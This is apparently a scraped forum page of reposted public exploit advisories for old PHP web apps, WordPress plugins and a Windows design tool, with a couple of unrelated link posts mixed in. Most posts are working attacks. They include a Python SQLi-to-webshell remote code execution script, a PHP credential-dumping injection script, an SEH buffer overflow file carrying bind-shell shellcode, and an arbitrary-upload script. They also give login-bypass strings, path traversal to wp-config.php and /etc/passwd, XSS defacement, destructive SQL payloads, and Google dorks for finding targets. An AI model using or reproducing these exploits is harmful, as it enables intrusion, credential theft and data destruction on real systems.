    phpAcounts v.0.5.3 SQL Injection ###################################################################################### # Exploit phpAcounts v.0.5.3 SQL Injection # Date: June 6nd 2012 # Author: loneferret # Version: 0.5.3 # Vendor Url: http://phpaccounts.com/ # Tested on: Ubuntu Server 11.10 ###################################################################################### # Discovered by: loneferret ###################################################################################### # Old app, still fun. Auth. Bypass: http://<server>/phpaccounts/index.php Username: x' or '1'='1'# Password: <whatever> Upload php shell in preferences Letterhead image upload does not sanitize file extensions. http://server/index.php?page=tasks&action=preferences Acess shell: Where '1' is the user's ID. http://server/phpaccounts/users/1/<filename> ---- Python PoC --------- #!/usr/bin/python import re, mechanize import urllib, sys print "\n[*] phpAcounts v.0.5.3 Remote Code Execution" print "[*] Vulnerability discovered by loneferret" print "[*] Offensive Security - http://www.offensive-security.com\n" if (len(sys.argv) != 3): print "[*] Usage: poc.py <RHOST> <RCMD>" exit(0) rhost = sys.argv[1] rcmd = sys.argv[2] print "[*] Bypassing Login ." try: br = mechanize.Browser() br.open("http://%s/phpaccounts/index.php?frameset=true" % rhost) assert br.viewing_html() br.select_form(name="loginForm") br.select_form(nr=0) br.form['Login_Username'] = "x' or '1'#" br.form['Login_Password'] = "pwnd" print "[*] Triggering SQLi .." br.submit() except: print "[*] Oups..Something happened" exit(0) print "[*] Uploading Shell ..." try: br.open("http://%s/phpaccounts/index.php?page=tasks&action=preferences" % rhost) assert br.viewing_html() br.select_form(nr=0) br.form["Preferences[LETTER_HEADER]"] = 'test' br.form.add_file(open('backdoor.php'), "text/plain", "backdoor.php", name="letterhead_image") br.submit(nr=2) except: print "[*] Upload didn't work" exit(0) print "[*] Command Executed\n" try: shell = urllib.urlopen("http://%s/phpaccounts/users/1/backdoor.php?cmd=%s" % (rhost,rcmd)) print shell.read() except: print "[*] Oups." exit(0) Sursa: phpAcounts v.0.5.3 SQL Injection
  15. The_Arhitect
    Wordpress Plugin: Newsletter 1.5 Remote File Disclosure Vulnerability ################################################## # Description : Wordpress Plugins - Plugin: Newsletter Remote File Disclosure Vulnerability # Version : 1.5 # Link : http://wordpress.org/extend/plugins/plugin-newsletter/ # Plugins : http://downloads.wordpress.org/plugin/plugin-newsletter.zip # Date : 31-05-2012 # Google Dork : inurl:/wp-content/plugins/plugin-newsletter/ # Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr ################################################## Exploit : http://www.exemple.com/wordpress/wp-content/plugins/plugin-newsletter/preview.php?data=../../../../wp-config.php Read source [CTRL-u] http://www.exemple.com/wordpress/wp-content/plugins/plugin-newsletter/preview.php?data=../../../../../../../../etc/passwd Read source [CTRL-u] Sursa: Wordpress Plugin: Newsletter 1.5 Remote File Disclosure Vulnerability
  16. The_Arhitect
    Wordpress RBX Gallery Plugin 2.1 Arbitrary File Upload ################################################## # Description : Wordpress Plugins - RBX Gallery Multiple Arbitrary File Upload Vulnerability # Version : 2.1 # Link : http://wordpress.org/extend/plugins/rbxgallery/ # Plugins : http://downloads.wordpress.org/plugin/rbxgallery.2.1.zip # Date : 03-06-2012 # Google Dork : inurl:/wp-content/plugins/rbxgallery/ # Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr ################################################## Exploit : PostShell.php <?php $uploadfile="lo.php"; $uploadfile2="db.php"; $ch = curl_init("http://www.exemple.com/wordpress/wp-content/plugins/rbxgallery/uploader.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('images[0]'=>"@$uploadfile", 'images[1]'=>"@$uploadfile2", 'Submit'=>'submit')); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> Shell Access : http://www.exemple.com/wordpress/wp-content/uploads/rbxslider/lo.php http://www.exemple.com/wordpress/wp-content/uploads/rbxslider/db.php lo.php <?php phpinfo(); ?> Sursa: Wordpress RBX Gallery Plugin 2.1 Arbitrary File Upload
  17. The_Arhitect
    PHPNet <= 1.8 (ler.php) SQL Injection <?php # Exploit Title: PHPNet <= 1.8 (ler.php) SQL Injection # Exploit Author: WhiteCollarGroup # Date: 06th 06 2012 # Vendor homepage: http://www.phpnet.com.br/ # Software Link: http://phpbrasil.com/script/Wb03ErMczAho/phpnetartigos # Google Dork: intext:"Powerd by Nielson Rocha" # Google Dork: inurl:"ler.php?id=" intext:"Voltar - Imprimir" # Version: 1.8 # Tested on: Debian GNU/Linux,Windows 7 Ultimate /* We discovered multiple vulnerabilities on the system. ~> SQL Injection This exploit is for a vulnerability in ler.php, but are the same vulnerability on imprimir.php and imagem.php. ler.php?id=[SQLi] imprimir.php?id=[SQLi] imagem.php?id=[SQLi] Usage: php file.php http://server/path/ ~> Login bypass In login page, you can bypass the login using "SQLi strings". Go to http://server/path/admin/login.php Login: ' or 1=1-- wc Pass: wcgroup ~> Arbitraty File Upload After open administration panel, try to add a new article. Use the upload form to upload your webshell. After posting, access: http://server/path/tmp/your_shell_filename.php ~> Information disclosure Access: http://server/path/conf/config.ini ~> XSS Stored (persistent) When posting a new article, you can post (D)HTML/Javascript codes on the page. */ function _printf($str) { echo $str."\n"; } function hex($string){ $hex=''; // PHP 'Dim' =] for ($i=0; $i < strlen($string); $i++){ $hex .= dechex(ord($string[$i])); } return '0x'.$hex; } set_time_limit(0); error_reporting(E_ERROR & E_USER_WARNING); @ini_set('default_socket_timeout', 30); echo "\n"; echo "PHPNet <= 1.8 SQLi Exploit\n"; echo "Discovered by WhiteCollarGroup\n"; echo "www.wcgroup.host56.com - whitecollar_group@hotmail.com"; if($argc!=2) { _printf("Usage:"); _printf("php $argv[0] <target>"); _printf("Example:"); _printf("php $argv[0] http://site.com/path/"); exit; } $target = $argv[1]; if(substr($target, (strlen($target)-1))!="/") { // se o ultimo caractere nao for uma barra $target .= "/"; } $inject = $target . "ler.php?id=-0'%20"; $token = uniqid(); $token_hex = hex($token); // vamos agora obter os seguintes dados: user() version() echo "\n\n[*] Trying to get informations...\n"; $infos = file_get_contents($inject.urlencode("union all select 1,2,3,4,concat(".$token_hex.",version(),".$token_hex.",user(),".$token_hex."),6,7,8-- ")); $infos_r = array(); preg_match_all("/$token(.*)$token(.*)$token/", $infos, $infos_r); $user = $infos_r[1][0]; $version = $infos_r[2][0]; if(($user) AND ($version)) { echo "[!] MySQL user: $user\n"; echo "[!] MySQL version: $version\n"; } else { echo "[-] Error while getting informations...\n"; } $i = 0; while(1==1) { $dados_r = array(); $dados = file_get_contents($inject.urlencode("union all select 1,2,3,4,concat(".$token_hex.",admin_user,".$token_hex.",admin_pass,".$token_hex."),6,7,8 from pna_admin limit $i,1-- ")); preg_match_all("/$token(.*)$token(.*)$token/", $dados, $dados_r); $login = $dados_r[1][0]; $senha = $dados_r[2][0]; if(($login) AND ($senha)) { echo " -+-\n"; echo "[!] User: $login\n"; echo "[!] Pass: $senha\n"; $i++; } else { break; // exitloop } if($i==0) { echo "[-] Exploit failed. Make sure that's server is using a valid version of PHPNet without mod_security. We're sorry."; } else { echo " -+-\n[!] :D"; } echo "\n"; } ?> Sursa: PHPNet <= 1.8 (ler.php) SQL Injection
  18. The_Arhitect
    SN News <= 1.2 (/admin/loger.php) Admin Bypass SQL Injection ############################################################################## ## SN News <= 1.2 (/admin/loger.php) Admin Bypass Remote SQL Injection Vulnerability ## Google Dork: "snews/visualiza.php?id=" ## Bug discovered by Pr0T3cT10n, <pr0t3ct10n@gmail.com> ## Date: 06/06/2012 ## Version: 1.2 ## Software Link: http://phpbrasil.com/script/JHnpFRmSBqlf/sn-news ## ISRAEL ############################################################################## ## Author will be not responsible for any damage. ############################################################################## ## Vulnerable Code - /admin/logar.php [4-15]: 4.$login = $_POST["login"]; 5.$senha = $_POST["senha"]; 6.$sql = "select * from news_adm where login='$login' AND senha='$senha'"; 7.$query = mysql_query($sql); 8.$nr = mysql_num_rows($query); 9.if($nr>0){ 10.$_SESSION["admin"] = "on"; 11.echo "<script> 12.location.href='../' 13.</script> 14."; 15.} ## NOTE: ## As you can see there is no validation or any filter to variables $login and $senha. ## See line 6, so you can inject sql query by using $login and $senha variables. ## SQL Injection PoC: ## http://127.0.0.1/sn_news/admin/login.htm ## Login: ' or '1'='1 ## Senha: ' or '1'='1 ## This injection will bypass the admin login screen. ############################################################################## # Cya # 0x31337.net ############################################################################## Sursa: SN News <= 1.2 (/admin/loger.php) Admin Bypass SQL Injection
  19. The_Arhitect
    Lattice Semiconductor PAC-Designer 6.21 (*.PAC) Exploit #!/usr/bin/python -w #------------------------------------------------------------------------------------# # Exploit: Lattice Semiconductor PAC-Designer 6.21 (possibly all versions) # # CVE: CVE-2012-2915 # # Author: b33f (Ruben Boonen) - http://www.fuzzysecurity.com/ # # OS: WinXP SP1 # # Software: http://www.latticesemi.com/products/designsoftware/pacdesigner/index.cfm # #------------------------------------------------------------------------------------# # I didn't dig to deep but it seems portability to other OS builds is not promising # # due to SafeSEH and badchars in the application modules. # #------------------------------------------------------------------------------------# # root@bt:~# nc -nv 192.168.111.130 9988 # # (UNKNOWN) [192.168.111.130] 9988 (?) open # # Microsoft Windows XP [Version 5.1.2600] # # (C) Copyright 1985-2001 Microsoft Corp. # # # # C:\Documents and Settings\Owner\Desktop> # #------------------------------------------------------------------------------------# filename="evil.PAC" PAC1 = """<?xml version="1.0"?> <PacDesignData> <DocFmtVersion>1</DocFmtVersion> <DeviceType>ispPAC-CLK5410D</DeviceType> <CreatedBy>PAC-Designer 6.21.1336</CreatedBy> <SummaryInformation> <Title>Oops..</Title> <Author>b33f</Author> </SummaryInformation> <SymbolicSchematicData> <Symbol> <SymKey>153</SymKey> <NameText>Profile 0 Ref Frequency</NameText> <Value>""" #------------------------------------------------------------------------------------# # msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -e x86/alpha_mixed -t c # # [*] x86/alpha_mixed succeeded with size 744 (iteration=1) # #------------------------------------------------------------------------------------# shellcode = ( "\x89\xe3\xd9\xd0\xd9\x73\xf4\x5e\x56\x59\x49\x49\x49\x49\x49" "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32" "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" "\x79\x6c\x59\x78\x4e\x69\x35\x50\x35\x50\x57\x70\x53\x50\x6b" "\x39\x6a\x45\x35\x61\x38\x52\x73\x54\x4c\x4b\x36\x32\x70\x30" "\x4e\x6b\x56\x32\x36\x6c\x6e\x6b\x72\x72\x32\x34\x6e\x6b\x33" "\x42\x66\x48\x56\x6f\x38\x37\x61\x5a\x45\x76\x56\x51\x59\x6f" "\x45\x61\x59\x50\x6e\x4c\x67\x4c\x73\x51\x73\x4c\x74\x42\x46" "\x4c\x45\x70\x4b\x71\x58\x4f\x54\x4d\x63\x31\x69\x57\x78\x62" "\x7a\x50\x46\x32\x63\x67\x6e\x6b\x70\x52\x66\x70\x4e\x6b\x30" "\x42\x47\x4c\x76\x61\x6e\x30\x4e\x6b\x57\x30\x73\x48\x4b\x35" "\x69\x50\x72\x54\x53\x7a\x75\x51\x6e\x30\x36\x30\x6e\x6b\x72" "\x68\x55\x48\x6e\x6b\x30\x58\x31\x30\x65\x51\x5a\x73\x7a\x43" "\x75\x6c\x72\x69\x6c\x4b\x64\x74\x4c\x4b\x45\x51\x6a\x76\x74" "\x71\x79\x6f\x76\x51\x4f\x30\x6c\x6c\x69\x51\x6a\x6f\x64\x4d" "\x35\x51\x69\x57\x45\x68\x4d\x30\x74\x35\x6b\x44\x75\x53\x73" "\x4d\x49\x68\x67\x4b\x61\x6d\x45\x74\x30\x75\x69\x72\x32\x78" "\x4c\x4b\x51\x48\x36\x44\x55\x51\x38\x53\x51\x76\x6c\x4b\x66" "\x6c\x42\x6b\x6c\x4b\x66\x38\x37\x6c\x66\x61\x38\x53\x4e\x6b" "\x63\x34\x6c\x4b\x67\x71\x48\x50\x6d\x59\x72\x64\x56\x44\x74" "\x64\x33\x6b\x31\x4b\x53\x51\x66\x39\x62\x7a\x72\x71\x59\x6f" "\x4b\x50\x33\x68\x31\x4f\x62\x7a\x4c\x4b\x35\x42\x4a\x4b\x6d" "\x56\x31\x4d\x42\x48\x36\x53\x30\x32\x57\x70\x33\x30\x42\x48" "\x71\x67\x52\x53\x57\x42\x43\x6f\x71\x44\x42\x48\x50\x4c\x43" "\x47\x71\x36\x53\x37\x79\x6f\x58\x55\x58\x38\x6a\x30\x56\x61" "\x65\x50\x73\x30\x76\x49\x6a\x64\x43\x64\x30\x50\x52\x48\x47" "\x59\x4d\x50\x30\x6b\x57\x70\x39\x6f\x6e\x35\x72\x70\x76\x30" "\x52\x70\x36\x30\x31\x50\x36\x30\x43\x70\x76\x30\x32\x48\x69" "\x7a\x64\x4f\x69\x4f\x79\x70\x49\x6f\x79\x45\x6e\x69\x4a\x67" "\x34\x71\x49\x4b\x62\x73\x43\x58\x63\x32\x77\x70\x56\x47\x76" "\x64\x6d\x59\x79\x76\x32\x4a\x56\x70\x32\x76\x61\x47\x63\x58" "\x38\x42\x4b\x6b\x67\x47\x53\x57\x59\x6f\x4e\x35\x31\x43\x76" "\x37\x33\x58\x48\x37\x69\x79\x35\x68\x69\x6f\x79\x6f\x6e\x35" "\x30\x53\x31\x43\x63\x67\x35\x38\x51\x64\x38\x6c\x75\x6b\x49" "\x71\x59\x6f\x79\x45\x43\x67\x6c\x49\x5a\x67\x42\x48\x52\x55" "\x30\x6e\x70\x4d\x61\x71\x79\x6f\x58\x55\x32\x48\x33\x53\x30" "\x6d\x33\x54\x43\x30\x4e\x69\x49\x73\x56\x37\x33\x67\x62\x77" "\x54\x71\x59\x66\x71\x7a\x57\x62\x32\x79\x36\x36\x38\x62\x6b" "\x4d\x61\x76\x58\x47\x51\x54\x74\x64\x57\x4c\x75\x51\x55\x51" "\x6e\x6d\x77\x34\x46\x44\x44\x50\x68\x46\x37\x70\x50\x44\x31" "\x44\x76\x30\x72\x76\x61\x46\x72\x76\x50\x46\x43\x66\x72\x6e" "\x31\x46\x76\x36\x71\x43\x30\x56\x33\x58\x43\x49\x38\x4c\x47" "\x4f\x6c\x46\x59\x6f\x6b\x65\x4f\x79\x79\x70\x32\x6e\x32\x76" "\x57\x36\x39\x6f\x70\x30\x43\x58\x45\x58\x4b\x37\x35\x4d\x73" "\x50\x79\x6f\x6e\x35\x4d\x6b\x6c\x30\x6c\x75\x79\x32\x73\x66" "\x62\x48\x6f\x56\x4c\x55\x4d\x6d\x6d\x4d\x39\x6f\x6a\x75\x65" "\x6c\x47\x76\x73\x4c\x64\x4a\x6d\x50\x79\x6b\x49\x70\x33\x45" "\x54\x45\x4f\x4b\x63\x77\x47\x63\x33\x42\x72\x4f\x51\x7a\x37" "\x70\x30\x53\x79\x6f\x68\x55\x41\x41") #------------------------------------------------------------------------------------# # SEH: 0x77512879 : pop esi # pop ecx # ret - SHELL32.dll # # nSEH: \xEB\x05 # #------------------------------------------------------------------------------------# b00m = "\x90"*20 + shellcode payload = "A"*98 + "\xEB\x05\x79\x28\x51\x77" + b00m + "C"*(5000-len(b00m)) PAC2 = """</Value> </Symbol> </SymbolicSchematicData> </PacDesignData>""" buffer = PAC1 + payload + PAC2 textfile = open(filename , 'w') textfile.write(buffer) textfile.close() Sursa: Lattice Semiconductor PAC-Designer 6.21 (*.PAC) Exploit
  20. The_Arhitect
    Main Page - Linux Mint
  21. The_Arhitect
    Browser Navigation Download Trick Another moderately interesting tidbit, I guess... It is an important and little-known property of web browsers that one document can always navigate other, non-same-origin windows to arbitrary URLs. Perhaps more interestingly, you can also navigate third-party documents to resources served with Content-Disposition: attachment, in which case, you get the original contents of the address bar, plus a rogue download prompt attached to an unsuspecting page that never wanted you to download that file. PoC: http://lcamtuf.coredump.cx/fldl/ ========== <input type=submit onclick="doit()" value="Click me. I like to be clicked."> <script> var w; var once; function doit() { if (navigator.userAgent.indexOf('MSIE') != -1) w = window.open('page2.html', 'foo'); else w = window.open('data:text/html,<meta http-equiv="refresh" content="0;URL=http://get.adobe.com/flashplayer/download/?installer=Flash_Player_11_for_Internet_Explorer_(64_bit)&os=Windows%207&browser_type=MSIE&browser_dist=OEM&d=Google_Toolbar_7.0&PID=4166869">', 'foo'); setTimeout(donext, 4500); } function donext() { window.open('http://199.58.85.40/download2.cgi', 'foo'); if (once != true) setTimeout(donext, 5000); once = true; } </script> ========== More info: http://lcamtuf.blogspot.com/2012/05/yes-you-can-have-fun-with-downloads.html It's closely related to many other fundamental, open issues with browser UI design - but I guess it's an interesting highlight. /mz Sursa: Browser Navigation Download Trick
      • 1
      • Upvote
  22. The_Arhitect
    Stereo Light - Obsession (Radio Version) - YouTube
  23. The_Arhitect
    Ganesha Digital Library 4.0 Multiple Vulnerabilities ===================================================== Ganesha Digital Library 4.0 Multiple Vulnerabilities ===================================================== :----------------------------------------------------------------------------------------------------------------------------------------: : # Exploit Title : Ganesha Digital Library 4.0 Multiple Vulnerabilities : # Date : 30 May 2012 : # Author : X-Cisadane : # Software Link : kmrg.itb.ac.id : # Version : 4.x : # Category : Web Applications : # Vulnerability : SQL Injection Vulnerability & NON-Persistent XSS Vulnerability : # Tested On : Mozilla Firefox 7.0.1 (Windows) : # Greetz to : X-Code, Borneo Crew, Depok Cyber, Dunia Santai,Jiban Crew, CodeNesia, Axon Code, Jember Hacker, Explore Crew, Winda Utari :----------------------------------------------------------------------------------------------------------------------------------------: Description : ============= Ganesha Digital Library (GDL) is a digital library software developed by Knowledge Management Research Group (KMRG) Institute of Technology Bandung (ITB) in order to harness the intellectual capital (intellectual capital) of ITB, which includes academic articles, journals, the final task, thesis, dissertation, research results, expertise and other directory. Dorks : ======= inurl:"/office.php?m=" intext:Copyright © 2002-2003 - KMRG ITB. All rights reserved intext:This work was carried out with the aid of a grant from YLTI Indonesia and IDRC Canada. intitle:" - GDL 4.0" POC : ===== [1] NON-Persistent XSS in the Account Activation Section There is a security flaw (NON-Persistent XSS) in the Account Activation Section. Activate Account in the left corner Menu. Then you'll be taken to Activate Account Page, Fill this script : '"><script>alert(1337)</script> on the Account Field and Code Field Then Click Activate. [2] NON-Persistent XSS in the Search Section XSS Script : '"><script>alert(1337)</script> For Example : http://server/pustaka/search.php?s=[Insert XSS Script] [3] NON-Persistent XSS in /office.php?m=lang&langid=[Insert XSS Script] XSS Script : '"><script>alert(1337)</script> For Example : Type XSS Script like this ---> http://server/office.php?m=lang&langid='"><script>alert(1337)</script> AND PRESS ENTER! Then you'll be taken to Error Page. Then edit the URL like this ---> http://server/office.php?m=lang&langid=en AND PRESS ENTER! If it Successfull, it will appear a Message Box "1337" P.S : Login Required! [4] NON-Persistent XSS DEFACING XSS Script : http://server/publisher.php?id=<script>document.body.innerHTML="<h1>XSS Defacing</h1>This Site Has XSSed By : X-Cisadane<br/>Greetz To : Poni, Wilmar Kidz, Anharku, Artificial Intelligence, Winda Utari, etc<br/>Visit http://xcode.or.id";</script> [5] SQL Injection on The Login Form (Gain SuperUser Access!) Open Ganesha Digital Library 4.0 Login Page For the example : Open http://server/login.php On the Account Field, Fill with this Symbol : '=0# On the Password Field Don't Fill Anything!!! Then Click Login Button. If it Successfull, you'll be got a Superuser GDL Access! You can try another site such as : http://server/login.php [6] SQL Injection on go.php?id=['SQL] SQL Injection on go.php?id=ID BLA BLA BLA&node=['SQL] SQL Injection on go.php?id=ID BLA BLA BLA&node=NODE ID BLA BLA BLA&start=['SQL] SQL Injection on go.php?id=ID BLA BLA BLA&node=NODE ID BLA BLA BLA&start=START ID BLA BLA BLA&node=['SQL] For Example : http://server/go.php?id='jkpkbppk-gdl-grey-2011-santoso-3848 http://server/go.php?id='dlhub-gdl-s1-2012-dewantiarl-23785 http://server/go.php?id=gdlhub-gdl-s1-2011-rizalabdul-15439&node='781&start=81&PHPSESSID=a46159e2d84c6d5fab6e581f7d3e7f3a http://server/go.php?id=gdlhub-gdl-s1-2011-rizalabdul-15439&node=781&start='81&PHPSESSID=a46159e2d84c6d5fab6e581f7d3e7f3a http://server/go.php?id=gdlhub-gdl-s1-2011-rizalabdul-15439&node=781&start=81&PHPSESSID=%27a46159e2d84c6d5fab6e581f7d3e7f3a [7] SQL Injection on publisher.php?id=['SQL] For Example : http://server/publisher.php?id=%27JBPEDONFAU [8] SQL Injection on go.php?node=['SQL] For Example : http://server/go.php?node='191 P.S : Login Required! [9] SQL Injection on office.php?m=explorer&a=['SQL]&b=expand&w=0 For Example : http://server/office.php?m=explorer&a='191&b=expand&w=0 P.S : Login Required! [10] SQL Injection on office.php?m=user&a=['SQL] For Example : http://server/office.php?m=user&a='pdsony@idola.net.id&b=edit P.S : Login Required! [11] SQL Injction on office.php?m=workgroup&a=['SQL]&b=edit For Example : http://server/office.php?m=workgroup&a='1&b=edit P.S : Login Required! [12] SQL Injection on office.php?m=user&so=desc&sb=['SQL] For Example : http://server/office.php?m=user&so=desc&sb='FULL_NAME http://server/office.php?m=user&so=asc&sb='EMAIL http://server/office.php?m=user&so=asc&sb='GID http://server/office.php?m=user&so=asc&sb='CONFIRM P.S : Login Required! Sursa: Ganesha Digital Library 4.0 Multiple Vulnerabilities
  24. The_Arhitect
    NewsAdd <=1.0 Multiple SQL Injection Vulnerabilities # Exploit Title: NewsAdd <=1.0 Multiple SQL Injection # Google Dork: ----------------------------------- # Date: 2012/05/29 # Author: WhiteCollarGroup # Software Link: http://phpbrasil.com/script/3tCyUs1JeL1M/newsadd--mysql # Version: 1.0 # Tested on: Debian GNU/Linux Developer URL: http://tvaini.ueuo.com/ Vulnerabilities discovered by WhiteCollarGroup www.wcgroup.host56.com whitecollar_group@hotmail.com If you will install NewsAdd on your system for tests, some servers have problems with tabulation. Therefore, replace the second query: --- begin --- CREATE TABLE IF NOT EXISTS 'comentario' ( 'id' int(11) NOT NULL AUTO_INCREMENT, 'id_noticia' int(11) NOT NULL, 'usuario' varchar(15) NOT NULL, 'comentario' text NOT NULL, 'data' datetime NOT NULL, PRIMARY_KEY('id') ) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=15 ; --- end --- By this: --- begin --- DROP TABLE IF EXISTS `comentario`; CREATE TABLE `comentario` ( `id` int(11) NOT NULL AUTO_INCREMENT, `id_noticia` int(11) NOT NULL, `usuario` varchar(15) NOT NULL, `comentario` text NOT NULL, `data` datetime NOT NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; --- end --- We discovered five SQL Injection vulnerabilities on public access. _ |_| Vulnerabilities before login / | SQL Injection on the search form \ The first vulnerability is in the search form, on index. Paste this in it: %' UNION ALL SELECT 1,group_concat(concat(email,0x3c3d3e,usuario,0x3c3d3e,senha,0x3c3d3e,admin,0x3c3d3e,banido)),3,4,5 from usuarios-- wc You will get a unique line like: admin@admin.com.br<=>admin<=>e10adc3949ba59abbe56e057f20f883e<=>1<=>0,user@email.com<=>user<=>ee11cbb19052e40b07aac0ca060c23ee<=>1<=>0 Lines are separated by commas (",") and columns, by "<=>". In the return, we have two lines: admin@admin.com.br<=>admin<=>e10adc3949ba59abbe56e057f20f883e<=>1<=>0 user@email.com<=>user<=>ee11cbb19052e40b07aac0ca060c23ee<=>1<=>0 Here, we have the columns as follow: email <=> username <=> md5(password) <=> admin? <=> banned? / | SQL Injection on comments \ For this, you must be a user. Register on the "cadastro.php" form. After, access: http://domain/comentar.php?id=-0' union all select 1,2,3,group_concat(concat(email,0x3c3d3e,usuario,0x3c3d3e,senha,0x3c3d3e,admin,0x3c3d3e,banido)),5 from usuarios--+ You will view a line like the previous example. _ |_| Vulnerabilities after login / | Delete all posts \ /admin/removerNoticia.php?id=0' or '1'='1&conf=sim / | Ban all users \ /admin/listarUsuarios.php?acao=banir&id=0' or '1'='1 / | Delete all users \ /admin/removerUsuario.php?id=0' or '1'='1&conf=sim Note that if you delete all users, you will lose access to the system. Sursa: NewsAdd <=1.0 Multiple SQL Injection Vulnerabilities
  25. The_Arhitect
    PBBoard v2.1.4 Multiple SQL Injection Vulnerabilities # Title: PBBoard v2.1.4 multiple SQLi Vulnerabilities # Version: 2.1.4 # Author/Found by: loneferret # Software Site: http://www.pbboard.com/PBBoard_v2.1.4.zip # Other vulnerabilities: http://www.exploit-db.com/exploits/18937/ # Date found: May 29th 2012 # Tested on: Ubuntu Server 8.04 / PHP Version 5.2.4-2ubuntu5.23 # Vulnerability: # Due to improper sanitization, many of the parameters are injectable. # Need a user account to trigger these. # As always you can have fun... PoC: Page: Personal Options settings Parameters: style= lang= hide_online= user_time= send_allow= pm_emailed= pm_window= visitormessage= Method: POST POST DATA: style=1?=1&hide_online=0&user_time=0&send_allow=1&pm_emailed=0&pm_window=1&visitormessage=2' where id='2' and sleep(5)#&send=Save By changing the 'id' number used in the 'where' clause, you can modify another user's settings. Id=1 being admin you can, for example, change his/her timezone POST DATA: style=1?=1& hide_online=0&user_time=+10& send_allow=1& pm_emailed=0& pm_window=1& visitormessage=2' where id='1'#&send=Save Another thing, you can get an XSS using the MySQL's error message. Which is always funny. POST DATA: style=1& lang=1& hide_online=0 &user_time=+10& send_allow=1& pm_emailed=0& pm_window=1& visitormessage=<script>alert('xss');</script>#&send=Save PoC #2: Here's another example, where we get mysql to sleep for 5 seconds, as well as change the admin's (id=1) avatar. Page: Change avatar Parameter: avatar_path= Method: POST POST DATA: -----------------------------68511802421187978011060806853\r\n Content-Disposition: form-data; name="options"\r\n \r\n list\r\n -----------------------------68511802421187978011060806853\r\n Content-Disposition: form-data; name="avatar_list"\r\n \r\n look/images/avatar/coof.jpg' where id='1' and sleep(5)#\r\n <--Right Here -----------------------------68511802421187978011060806853\r\n Content-Disposition: form-data; name="avatar"\r\n \r\n http://\r\n -----------------------------68511802421187978011060806853\r\n Content-Disposition: form-data; name="upload"; filename=""\r\n Content-Type: application/octet-stream\r\n \r\n \r\n -----------------------------68511802421187978011060806853\r\n Content-Disposition: form-data; name="change_avatar"\r\n \r\n Edit Settings\r\n -----------------------------68511802421187978011060806853--\r\n PoC #3: SQLi in the cookie. Just need to modify the cookie value using your favorite tool. Parameter: PowerBB_username & PowerBB_password PowerBB_username=loneferret' and sleep(5)# or PowerBB_password=e10adc3949ba59abbe56e057f20f883e' and sleep(5)# (and if you're wondering there are 58 fields) Sursa: PBBoard v2.1.4 Multiple SQL Injection Vulnerabilities
×
×
  • Create New...